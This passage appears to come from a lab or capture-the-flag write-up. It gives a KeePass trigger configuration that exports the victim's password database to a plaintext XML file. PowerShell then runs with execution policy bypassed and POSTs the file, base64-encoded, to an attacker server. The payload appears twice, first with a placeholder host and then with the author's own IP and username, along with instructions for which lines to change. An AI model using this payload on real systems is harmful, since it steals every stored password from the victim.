<Triggers> <Trigger> <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid> <Name>exploit</Name> <Events> <Event> <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid> <Parameters> <Parameter>0</Parameter> <Parameter /> </Parameters> </Event> </Events> <Conditions /> <Actions> <Action> <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid> <Parameters> <Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter> # This one <Parameter>KeePass XML (2.x)</Parameter> <Parameter /> <Parameter /> </Parameters> </Action> <Action> <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid> <Parameters> <Parameter>PowerShell.exe</Parameter> <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one <Parameter>False</Parameter> <Parameter>1</Parameter> <Parameter /> </Parameters> </Action> </Actions> </Trigger> </Triggers>
I have to change 2 lines. The first one to replace by the user of the windows. The second for the same ting + give the address of the web server. This is my version:
1 2 3 4 5 6 7 8 9 10
... <Parameters> <Parameter>c:\Users\peanutstick\AppData\Local\Temp\exploit.xml</Parameter> # This one <Parameter>KeePass XML (2.x)</Parameter> ... ... <Parameter>PowerShell.exe</Parameter> <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://192.168.1.69:1337/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\peanutstick\AppData\Local\Temp\exploit.xml'))) </Parameter> # And this one <Parameter>False</Parameter> ...
